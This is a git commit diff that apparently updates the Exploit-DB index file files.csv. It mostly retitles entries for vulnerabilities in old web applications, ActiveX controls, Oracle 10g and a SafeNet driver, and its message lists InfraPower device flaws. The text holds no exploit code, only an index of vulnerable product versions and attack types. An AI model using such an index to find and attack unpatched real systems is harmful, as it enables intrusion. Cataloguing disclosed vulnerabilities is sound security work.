DB: 2016-10-29
7 new exploits SetCMS 3.6.5 - (setcms.org) Remote Command Execution SetCMS 3.6.5 - Remote Command Execution PHP-Nuke < 8.0 - 'sid' SQL Injection PHP-Nuke 8.0 Final - 'sid' SQL Injection PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection Foojan Wms 1.0 - (index.php story) SQL Injection Foojan Wms 1.0 - 'story' Parameter SQL Injection Web Wiz Forums 9.07 - (sub) Directory Traversal Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal Web Wiz NewsPad 1.02 - (sub) Directory Traversal Siteman 1.1.9 - (cat) Remote File Disclosure Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution SLAED CMS 2.5 Lite - (newlang) Local File Inclusion Liquid-Silver CMS 0.1 - (update) Local File Inclusion Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC) Seagull 0.6.3 - 'files' Parameter Remote File Disclosure ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC) flinx 1.3 - (category.php id) SQL Injection flinx 1.3 - 'id' Parameter SQL Injection Persits XUpload 3.0 - AddFile() Remote Buffer Overflow Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities Simple Forum 3.2 - File Disclosure / Cross-Site Scripting WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash) Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash) WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash) Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash) phpMyClub 0.0.1 - (page_courante) Local File Inclusion bubbling library 1.32 - dispatcher.php Remote File Disclosure Bigware Shop 2.0 - pollid SQL Injection Smart Publisher 1.0.1 - (disp.php) Remote Code Execution SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion bubbling library 1.32 - 'uri' Parameter Remote File Disclosure Bigware Shop 2.0 - 'pollid' Parameter SQL Injection Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit phpCMS 1.2.2 - (parser.php) Remote File Disclosure Mambo Component NewsLetter - (listid) SQL Injection Mambo Component Fq - (listid) SQL Injection Mambo Component MaMML - (listid) SQL Injection phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection Mambo 'com_fq' - 'listid' Parameter SQL Injection Mambo 'com_mamml' - 'listid' Parameter SQL Injection phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - 'counter.php' Remote File Inclusion phpCMS 1.1.7 - 'parser.php' Remote File Inclusion phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion phpCMS 2008 - 'ask/search_ajax.php' SQL Injection phpCMS 2008 - 'search_ajax.php' SQL Injection InfraPower PPS-02-S Q213V1 - Local File Disclosure InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference InfraPower PPS-02-S Q213V1 - Authentication Bypass InfraPower PPS-02-S Q213V1 - Multiple XSS InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
This commit is contained in:
parent
d97b4f7c48
commit
3b565e4e9d
8 changed files with 1462 additions and 39 deletions
85
files.csv
85
files.csv
|
@ -4610,53 +4610,53 @@ id,file,description,date,author,platform,type,port
|
||||||
4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
|
4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0
|
||||||
4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
|
4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0
|
||||||
4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
||||||
4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
|
4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
|
||||||
4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
|
4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0
|
||||||
4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
||||||
4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
||||||
4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0
|
||||||
4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
|
4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0
|
||||||
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
|
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - 'story' Parameter SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
|
||||||
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
|
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0
|
||||||
4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
|
4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
|
||||||
4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
|
4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
|
||||||
4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
|
4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0
|
||||||
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
|
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0
|
||||||
4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0
|
4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote,0
|
||||||
4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
|
4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0
|
||||||
4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0
|
4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion",2008-01-23,Stack,php,webapps,0
|
||||||
4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
|
4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0
|
||||||
4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
|
4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0
|
||||||
4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
|
4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0
|
||||||
4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
|
4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'files' Parameter Remote File Disclosure",2008-01-24,fuzion,php,webapps,0
|
||||||
4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
|
4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0
|
||||||
4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
|
4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
|
||||||
4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
|
4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0
|
||||||
4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0
|
4985,platforms/php/webapps/4985.txt,"flinx 1.3 - 'id' Parameter SQL Injection",2008-01-25,Houssamix,php,webapps,0
|
||||||
4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
|
4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0
|
||||||
4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
|
4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0
|
||||||
4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
|
4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0
|
||||||
4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0
|
4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 - File Disclosure / Cross-Site Scripting",2008-01-26,tomplixsee,php,webapps,0
|
||||||
4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
|
4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 - Multiple SQL Injections",2008-01-26,"Charles Hooper",php,webapps,0
|
||||||
4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
|
4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion",2008-01-26,Stack,php,webapps,0
|
||||||
4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
|
4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
|
||||||
4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0
|
4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection",2008-01-27,Houssamix,php,webapps,0
|
||||||
4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
|
4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
|
||||||
4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
|
4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0
|
||||||
4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
|
4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0
|
||||||
4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
|
4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0
|
||||||
4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
|
4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0
|
||||||
4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
|
4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0
|
||||||
5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
|
5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0
|
||||||
5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0
|
5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - 'uri' Parameter Remote File Disclosure",2008-01-28,Stack,php,webapps,0
|
||||||
5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0
|
5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - 'pollid' Parameter SQL Injection",2008-01-29,D4m14n,php,webapps,0
|
||||||
5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
|
5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0
|
||||||
5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
|
5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0
|
||||||
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
|
5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0
|
||||||
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
|
5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0
|
||||||
5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
5007,platforms/php/webapps/5007.txt,"Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
||||||
5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
5008,platforms/php/webapps/5008.txt,"Mambo 'com_fq' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
||||||
5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
5009,platforms/php/webapps/5009.txt,"Mambo 'com_mamml' - 'listid' Parameter SQL Injection",2008-01-29,S@BUN,php,webapps,0
|
||||||
5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
|
5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - 'catid' SQL Injection",2008-01-30,S@BUN,php,webapps,0
|
||||||
5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
|
5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes - (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0
|
||||||
5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
|
5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 - template_path Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0
|
||||||
|
@ -26419,16 +26419,16 @@ id,file,description,date,author,platform,type,port
|
||||||
29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
|
29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
|
||||||
29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
|
29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
|
||||||
29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
|
29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
|
||||||
29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29346,platforms/php/webapps/29346.txt,"phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29347,platforms/php/webapps/29347.txt,"phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29348,platforms/php/webapps/29348.txt,"phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29349,platforms/php/webapps/29349.txt,"phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29350,platforms/php/webapps/29350.txt,"phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29351,platforms/php/webapps/29351.txt,"phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
29352,platforms/php/webapps/29352.txt,"phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
|
||||||
29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
|
29375,platforms/php/webapps/29375.txt,"Simplog 0.9.3 - archive.php SQL Injection",2007-01-02,"Javor Ninov",php,webapps,0
|
||||||
29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
|
29376,platforms/php/webapps/29376.txt,"VCard Pro - gbrowse.php Cross-Site Scripting",2007-01-02,exexp,php,webapps,0
|
||||||
29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
|
29354,platforms/php/webapps/29354.txt,"pdirl PHP Directory Listing 1.0.4 - Cross-Site Scripting Web Vulnerabilities",2013-11-01,Vulnerability-Lab,php,webapps,0
|
||||||
|
@ -29720,7 +29720,7 @@ id,file,description,date,author,platform,type,port
|
||||||
32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
|
32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0
|
||||||
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
|
32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0
|
||||||
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
|
32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
|
||||||
32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
|
32873,platforms/php/webapps/32873.txt,"phpCMS 2008 - 'search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0
|
||||||
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
|
32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0
|
||||||
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
|
32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0
|
||||||
